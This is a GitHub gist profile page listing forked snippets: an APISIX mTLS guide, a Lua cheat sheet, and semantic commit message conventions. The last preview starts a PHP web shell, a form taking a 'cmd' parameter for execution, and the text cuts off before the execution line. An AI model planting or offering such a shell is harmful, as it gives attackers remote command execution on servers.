Skip to content

Instantly share code, notes, and snippets.

View kayx23's full-sized avatar
:octocat:
off the wall

Traky Deng kayx23

:octocat:
off the wall
View GitHub Profile
@kayx23
kayx23 / grpc-status.md
Created November 10, 2023 01:53 — forked from kingluo/grpc-status.md
Everything about APISIX GRPC functionalities

APISIX mTLS for client to APISIX

Introduction

This gist provides a complete example of client-side authentication for Apache APISIX.

It includes the process of:

  • generating a certificate
  • configuring the certificate in APISIX
  • configuring the route in APISIX
@kayx23
kayx23 / lua_5_4.md
Created February 24, 2023 10:10 — forked from roalcantara/lua_5_4.md
Lua 5.4 - Cheat Sheet

Lua - Beginners Guide

Printing

print("Hello World")

Comments

--this is a comment
@kayx23
kayx23 / semantic-commit-messages.md
Created February 22, 2023 07:00 — forked from joshbuchea/semantic-commit-messages.md
Semantic Commit Messages

Semantic Commit Messages

See how a minor change to your commit message style can make you a better programmer.

Format: <type>(<scope>): <subject>

<scope> is optional

Example

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{